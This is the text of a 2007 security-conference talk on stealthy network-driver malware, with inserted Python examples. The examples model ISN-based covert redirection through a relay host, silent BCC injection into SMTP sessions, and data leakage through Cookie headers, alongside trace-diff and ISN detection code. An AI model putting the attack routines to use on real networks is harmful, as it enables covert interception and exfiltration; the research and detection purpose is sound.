TCP/IP Perversion
Rares Stefan, Third Brigade Inc.
SecTor 2007
1
Introduction

Perspective from a researcher focused on
protecting hosts from malware

Implementing kernel-based protection
mechanisms

Insight into a potential class of network driver
malware
2
The Rise of Silent Malware

Three main areas of interest in malware
R&D:

Delivery and activation

Hiding presence - rootkit techniques

Evasion - Minimize operating noise
  Show no signs of activity on the infected system
  Show no traces of network activity on the wire

3
Operational Challenges

Operate on wire data

Active at a layer that guarantees transparency
to the host

Correctly perform inline IP reassembly and
TCP stream reassembly

Allow for arbitrary injection/removal of data in
TCP sessions
4
Operational Challenges…part deux

Maintain silence on the host:
  Never initiate TCP sessions
  Never receive TCP open-session requests
  Do not rely on TCP port splicing if the infected host is a server
  Do not rely on static motherships if the infected host is a workstation
  Packet modifications should not be easily visible in local network traces

5
Operational Challenges…part trois

Maintain silence on the wire:
  Only make use of legitimate TCP sessions
  Do not alter protocol semantics - resistance to network anomaly detection engines
  Piggyback on encrypted channels (SSL) and multiple TCP sessions for large data transfers
6
Driver Implementation Pre-Vista
(layer diagram, top to bottom)
  User Land: Never
  TDI: Access to data stream, not packets
  TCP/IP (FW hook, PF hook): Some interesting areas; no guaranteed access to outbound payload
  NDIS (NDIS.SYS, intermediate driver, miniport driver): NDIS hooking
    - Some delivery challenges
    - Most flexibility
    - Driver signing issues
    - Complete control over hardware-driver to transport-protocol communications
7
Rogue Network Driver Framework

  Firewall hook kernel module for basic packet header operations
  IM Filter driver:
    Inline IP reassembly
    Inline TCP stream reassembly
    TCP session normalization
8
Packet Header Modifications
9
Infected Workstation
(diagram; hosts 10.0.1.26 and 10.0.1.124)
  ALICE opens https://server
  Alice's driver, DNAT: DstIP_server -> DstIP_Bob
  BOB's driver, SNAT/DNAT: SrcIP_Alice -> SrcIP_Bob; DstIP_Bob -> DstIP_server
  Translated request reaches server
10
Infected Server
(diagram)
  ALICE: https://server (https request served)
  ALICE: telnet server:80
  Server's driver, selective DN(P)AT on Alice's traffic: SrcIP_Alice -> SrcIP_server; Dst_Port_443 -> DstPort_135
12
Packet Header Opportunities

Passive covert channels
  http://www.invisiblethings.org/papers/passive-covert-channels-linux.pdf
  http://www.ouah.org/neural_networks_vs_NUSHU.pdf
  http://staff.science.uva.nl/~delaat/snb-2005-2006/p27/report.pdf
Port splicing
Most significant; communicating the original intent:
  DNAT on outgoing SYN – change destination address to that of the MIM
  Insert original dstIP in header fields
  MIM double NAT
14
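Worked example (added here, not code from the talk): a user-space Python model of the workstation scenario above, rewriting a SYN's IPv4/TCP headers the way the two drivers would and recomputing both checksums so nothing on the wire looks malformed. It assumes 10.0.1.26 is Alice and 10.0.1.124 is Bob (the diagram shows both addresses without saying which is which), 192.0.2.10 for the server, and that the TCP ISN is the header field carrying the original destination; the deck only says "header fields". The seq delta that alice_outbound_syn returns is the per-session state the driver has to keep so the server's ACKs can be mapped back onto the ISN Alice's own stack chose.

```python
import struct

# Added example, not code from the SecTor 2007 deck. Assumptions: 10.0.1.26 is
# Alice, 10.0.1.124 is Bob (the MIM), 192.0.2.10 is the server, and the TCP ISN
# is the header field that carries the original destination.

def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum of 16-bit words; odd lengths are zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def ip_bytes(addr: str) -> bytes:
    return bytes(int(o) for o in addr.split("."))

def ip_str(raw: bytes) -> str:
    return ".".join(str(o) for o in raw)

def fix_checksums(ip: bytearray, tcp: bytearray) -> bytes:
    """Recompute the IPv4 header checksum and the TCP checksum (pseudo-header
    included) after any field was rewritten; return the whole packet."""
    ip[10:12] = b"\x00\x00"
    ip[10:12] = struct.pack("!H", checksum(bytes(ip)))
    tcp[16:18] = b"\x00\x00"
    pseudo = bytes(ip[12:20]) + struct.pack("!BBH", 0, 6, len(tcp))
    tcp[16:18] = struct.pack("!H", checksum(pseudo + bytes(tcp)))
    return bytes(ip + tcp)

def build_tcp(src, dst, sport, dport, seq, ack=0, flags=0x02) -> bytes:
    """Construct a minimal IPv4 (20 B) + TCP (20 B, no options) segment; SYN by default."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234, 0x4000,
                     64, 6, 0, ip_bytes(src), ip_bytes(dst))
    return fix_checksums(bytearray(ip), bytearray(tcp))

def rewrite(pkt: bytes, src=None, dst=None, seq=None, ack=None) -> bytes:
    """Return pkt with the given fields replaced and both checksums valid again."""
    ip, tcp = bytearray(pkt[:20]), bytearray(pkt[20:])
    if src is not None:
        ip[12:16] = ip_bytes(src)
    if dst is not None:
        ip[16:20] = ip_bytes(dst)
    if seq is not None:
        tcp[4:8] = struct.pack("!I", seq)
    if ack is not None:
        tcp[8:12] = struct.pack("!I", ack)
    return fix_checksums(ip, tcp)

def parse(pkt: bytes) -> dict:
    """Decode the fields the example cares about and verify both checksums."""
    ip, tcp = pkt[:20], pkt[20:]
    sport, dport, seq, ack, _, flags = struct.unpack("!HHIIBB", tcp[:14])
    pseudo = ip[12:20] + struct.pack("!BBH", 0, 6, len(tcp))
    return {"src": ip_str(ip[12:16]), "dst": ip_str(ip[16:20]), "sport": sport,
            "dport": dport, "seq": seq, "ack": ack, "flags": flags,
            "ip_ok": checksum(ip) == 0, "tcp_ok": checksum(pseudo + tcp) == 0}

# ---- Alice: infected workstation -------------------------------------------
def alice_outbound_syn(pkt: bytes, mim_ip: str):
    """DNAT the SYN to the MIM and smuggle the real destination in the ISN.
    Returns the wire packet and the seq delta the driver must keep per session."""
    real_dst = ip_str(pkt[16:20])
    stack_isn = struct.unpack("!I", pkt[24:28])[0]
    covert_isn = struct.unpack("!I", ip_bytes(real_dst))[0]  # a 32-bit IPv4 fits exactly
    delta = (covert_isn - stack_isn) & 0xFFFFFFFF
    return rewrite(pkt, dst=mim_ip, seq=covert_isn), delta

def alice_inbound(pkt: bytes, real_dst: str, delta: int) -> bytes:
    """Reverse the translation for Alice's own stack: replies must appear to come
    from the server it asked for, and ACK numbers must match the stack's ISN."""
    ack = struct.unpack("!I", pkt[28:32])[0]
    return rewrite(pkt, src=real_dst, ack=(ack - delta) & 0xFFFFFFFF)

# ---- Bob: the MIM workstation -----------------------------------------------
def mim_forward_syn(pkt: bytes, mim_ip: str) -> bytes:
    """Double NAT: read the intended server out of the ISN and resend as Bob."""
    intended = ip_str(pkt[24:28])
    return rewrite(pkt, src=mim_ip, dst=intended)

def mim_return(pkt: bytes, mim_ip: str, alice_ip: str) -> bytes:
    """Reverse double NAT for the server's reply: source Bob, destination Alice."""
    return rewrite(pkt, src=mim_ip, dst=alice_ip)
```

Build a SYN with build_tcp("10.0.1.26", "192.0.2.10", 40000, 443, 0x11223344), pass it through alice_outbound_syn and mim_forward_syn, and parse() each result: the first hop keeps Alice as source but points at Bob with the ISN turned into 192.0.2.10, and Bob's copy has Bob as source and the real server as destination, both with valid checksums. That ordinary-looking ISN is what the ISN analysis on the detection slide would have to key on.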
Why Payload Injection?

Access to packet data

High bandwidth channel

Bypass application proxies

Altering TCP data length on the wire is not
trivial!
15
Inline Injection

Support for IP reassembly on incoming
traffic and IP fragmentation on outbound
traffic

Support for TCP stream reassembly – segment
reordering, injection of acknowledgements
and resets, among other things
16
Inline TCP Reassembly

Maintain two edges (pre and post modification), tracking:
  ISN
  MaxSeq
  MaxAck
  Window
  Maximum SeqNo of Filtered Data
  Maximum AckNo of Filtered Data
  Queue/counter for non Ack-ed datagrams
  Queue/counter for not sent datagrams
  Needed Window Scale
  Actual Window Scale
17
SMTP Injection – Eliminating Bob from the Equation

  Reduces the complexity of the MIM and random redirection
  Works with application-level proxies
  Replace the RCPT TO argument or inject an additional RCPT TO (BCC)
  Increases the probability of detection – SMTP server logs
18
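Added example (not the author's code) of how the "two edges" state from the Inline TCP Reassembly slide plays out for this BCC injection. Adding a second RCPT TO lengthens the client-to-server stream, and the server then answers a command the client never sent, so the driver must also shorten the server-to-client stream and shift sequence and acknowledgement numbers in both directions. The model below keeps only the counters needed for that; retransmissions, segment reordering, multi-line replies and SMTP pipelining are out of scope, and eva@example.net is a constructed address.

```python
import re

# Added example, not code from the SecTor 2007 deck. Simplifications: the client
# does not pipeline, SMTP replies are single CRLF-terminated lines, and TCP
# retransmission/reordering is not handled.

class SmtpBccInjector:
    """Keeps the pre-modification edge (what Alice's stack sent and expects)
    aligned with the post-modification edge (what is on the wire) while one
    RCPT TO is added to the client->server stream and the server's extra
    reply is removed from the server->client stream."""

    def __init__(self, bcc: str):
        self.inject = b"RCPT TO:<" + bcc.encode() + b">\r\n"
        self.added = 0          # bytes added to client->server data so far
        self.removed = 0        # bytes dropped from server->client data so far
        self.injected = False
        self.replies_to_skip = 0
        self.replies_since = 0  # reply lines seen since the injection

    def client_to_server(self, seq: int, ack: int, payload: bytes):
        """Translate one client segment to wire numbering, injecting once.
        seq shifts by what was added earlier; ack shifts by what the server
        believes it sent but the client never saw."""
        wire_seq = (seq + self.added) & 0xFFFFFFFF
        wire_ack = (ack + self.removed) & 0xFFFFFFFF
        if not self.injected:
            m = re.search(rb"^RCPT TO:<[^>]*>\r\n", payload, re.I | re.M)
            if m:
                payload = payload[:m.end()] + self.inject + payload[m.end():]
                self.added += len(self.inject)
                self.injected = True
                self.replies_to_skip = 1
        return wire_seq, wire_ack, payload

    def server_to_client(self, seq: int, ack: int, payload: bytes):
        """Translate one server segment to host numbering and swallow the reply
        to the injected command (the second reply line after the injection)."""
        host_seq = (seq - self.removed) & 0xFFFFFFFF   # use removed as of before this segment
        host_ack = (ack - self.added) & 0xFFFFFFFF
        if self.replies_to_skip and payload:
            kept = []
            for line in payload.split(b"\r\n")[:-1]:   # assumes whole CRLF-terminated lines
                self.replies_since += 1
                if self.replies_since == 2 and self.replies_to_skip:
                    self.removed += len(line) + 2
                    self.replies_to_skip -= 1
                else:
                    kept.append(line)
            payload = b"".join(l + b"\r\n" for l in kept)
        # An emptied payload leaves a bare ACK, which a driver may forward or drop.
        return host_seq, host_ack, payload
```

Feed the exchange segment by segment (MAIL FROM, its 250, RCPT TO, the two 250s, DATA): after the RCPT TO segment the wire sequence numbers run 27 bytes ahead of what Alice's stack believes, the server's acknowledgements are pulled back by the same 27 bytes, and once the second 250 has been swallowed the client's acknowledgements are pushed forward by its 14 bytes. Every counter that moves here is one of the fields listed on the reassembly slide.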
SMTP Injection
(diagram)
  Alice sends Bob a message
  Alice's driver injects a BCC to Eva
  SMTP Server delivers: Bob receives the original message; so does Eva
19
SMTP Injection Demo
(video)
20
HTTP Injection

  TCP headers useless – a proxy terminates the TCP session, so header-field channels do not survive it; we need a workaround
  Easy workaround, but we need to be careful:
    Transparent proxies (the initial HTTP request looks normal, so we will always assume we may be transparently "proxied")
    Direct proxies – easy to spot in HTTP(S) requests
  URI & headers will help us redirect/leak data:
    Make use of Authorization and Cookie headers – they won't be scrubbed
    POST data also presents injection opportunities
23
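Added example (not from the deck) of the header channel described above: the data to be leaked rides in a Cookie pair that application proxies forward unchanged, the request line and Content-Length are untouched so the request still looks like an ordinary browser request, and the byte delta is returned because the TCP edge state has to absorb the length change. The cookie name "sid", the sample request and the payload are constructed.

```python
import base64
from typing import Optional, Tuple

# Added example, not code from the SecTor 2007 deck. The cookie name "sid",
# SAMPLE_REQUEST and the leaked bytes are constructed.

def inject_cookie(request: bytes, name: str, data: bytes) -> Tuple[bytes, int]:
    """Append name=<urlsafe-base64 data> to the Cookie header (or add one).
    Request line, body and Content-Length are untouched, so a proxy sees a
    well-formed request. Returns (new_request, bytes_added)."""
    head, sep, body = request.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    pair = name.encode() + b"=" + base64.urlsafe_b64encode(data).rstrip(b"=")
    for i in range(1, len(lines)):
        if lines[i].lower().startswith(b"cookie:"):
            lines[i] = lines[i] + b"; " + pair
            break
    else:
        lines.append(b"Cookie: " + pair)
    out = b"\r\n".join(lines) + sep + body
    return out, len(out) - len(request)

def extract_cookie(request: bytes, name: str) -> Optional[bytes]:
    """Bob's side: pull the pair back out of whatever proxy-forwarded request arrives."""
    head = request.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:
        if line.lower().startswith(b"cookie:"):
            for pair in line.split(b":", 1)[1].split(b";"):
                k, _, v = pair.strip().partition(b"=")
                if k == name.encode():
                    return base64.urlsafe_b64decode(v + b"=" * (-len(v) % 4))
    return None

SAMPLE_REQUEST = (b"GET /search?q=sector HTTP/1.1\r\n"
                  b"Host: www.google.com\r\n"
                  b"Cookie: PREF=ID=1\r\n"
                  b"\r\n")
```

inject_cookie(SAMPLE_REQUEST, "sid", b"secret-bytes") leaves the first line and Host header as they were and only grows the existing Cookie header; a content filter that checks URI and Host sees nothing new, while extract_cookie recovers the bytes on the far side.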
HTTP Injection
(diagram: ALICE, Web Proxy – Content Filtering, BOB, google.com)
  ALICE requests http://www.google.com
  Change request; inject data
24
SSL Injection Demo
(diagram: ALICE, Perimeter Security, BOB, somebank.com)
  ALICE requests https://somebank.com
  Inject data
26
SSL Alice – browser video
28
Detecting Network Driver Malware

Conventional detection mechanisms
  AV, AS signatures; configuration mgmt
New detection mechanisms
  Traffic based detection?
    Malicious destinations, ISN analysis
    Network trace diff – local vs. remote
    NDIS based sniffer for better visibility?
  Other
    Host based application control ineffective
    DLP?
    …
29
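Added example (not the author's code): two of the traffic-based ideas above written as checks an operator could run on SYN summaries pulled from a host-side capture (an NDIS-level sniffer, as the slide suggests) and a span-port capture. The ISN analysis assumes the driver encodes the original destination in the ISN, which is one reading of "insert original dstIP in header fields" on the Packet Header Opportunities slide, not something the deck states; all records and prefixes are constructed.

```python
from ipaddress import ip_address, ip_network

# Added example, not code from the SecTor 2007 deck. Records are SYN summaries
# from two captures; SAMPLE_LOCAL, SAMPLE_REMOTE and OUR_NETS are constructed.

def syn_record(src, sport, dst, dport, seq):
    return {"src": src, "sport": sport, "dst": dst, "dport": dport, "seq": seq}

def trace_diff(local, remote):
    """Network trace diff, local vs. remote: pair SYNs by (src, sport) and report
    what a driver sitting below the host sniffer changed or hid. A rogue NDIS
    driver rewrites after the host capture point, so the host copy shows the
    real destination and the wire copy shows the MIM."""
    findings = []
    unmatched = {(r["src"], r["sport"]): r for r in remote}
    for l in local:
        r = unmatched.pop((l["src"], l["sport"]), None)
        if r is None:
            findings.append(("missing_on_wire", l, {}))
            continue
        changed = {f: (l[f], r[f]) for f in ("dst", "dport", "seq") if l[f] != r[f]}
        if changed:
            findings.append(("rewritten", l, changed))
    for r in unmatched.values():
        findings.append(("unseen_by_host", r, {}))
    return findings

def isn_encodes_address(seq, nets):
    """ISN analysis: does the SYN's sequence number read as an IPv4 address inside
    one of the organisation's own prefixes? Random ISNs land in a /8 about 0.4% of
    the time, so a hit is a lead to correlate with trace_diff, not proof."""
    addr = ip_address(seq & 0xFFFFFFFF)
    return any(addr in n for n in nets)

def suspicious_flows(local, remote, nets):
    """Combine both checks: flows rewritten on the wire whose wire ISN decodes to
    an address in our prefixes (the original destination smuggled to the MIM)."""
    hits = []
    for kind, rec, changed in trace_diff(local, remote):
        if kind == "rewritten" and "seq" in changed and isn_encodes_address(changed["seq"][1], nets):
            hits.append((rec["src"], rec["sport"], str(ip_address(changed["seq"][1]))))
    return hits

SAMPLE_LOCAL = [syn_record("10.0.1.26", 40000, "192.0.2.10", 443, 0x11223344),
                syn_record("10.0.1.26", 40001, "198.51.100.7", 80, 0x0BADF00D)]
SAMPLE_REMOTE = [syn_record("10.0.1.26", 40000, "10.0.1.124", 443, 0xC000020A),
                 syn_record("10.0.1.26", 40001, "198.51.100.7", 80, 0x0BADF00D)]
OUR_NETS = [ip_network("192.0.2.0/24"), ip_network("10.0.0.0/8")]
```

On the sample data the second flow is identical in both captures and produces nothing, while the first is reported as rewritten (destination and ISN differ) and its wire ISN decodes to 192.0.2.10, the destination the host capture shows. A driver that hooked below the host sniffer as well would defeat the diff, which is why the slide asks for better visibility rather than treating any single vantage point as trusted.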
Conclusions

Passive kernel malware difficult to spot

There are significant implementation
challenges for coders

Prevention remains key approach
30
Thank You
31
Backup slides (screen captures, slides 31-67)
  Infected Workstation: Alice – Browser Capture; Alice-Bob Network Traces; Alice Driver_SNAT; Alice_SNAT; Bob_Double_NAT (four captures)
  Infected Server: Server network trace; Server SNAT&DPAT
  HTTP Injection: Alice – browser video; Alice – network trace; Alice – original data; Alice – driver work (four captures); Bob – driver work; Bob – modified request; Bob – driver work (two captures)
  SSL Injection: Alice – original data; Post Insert – Wire Noise!; Alice – SSL clean; Bob – Post modification. Clean!!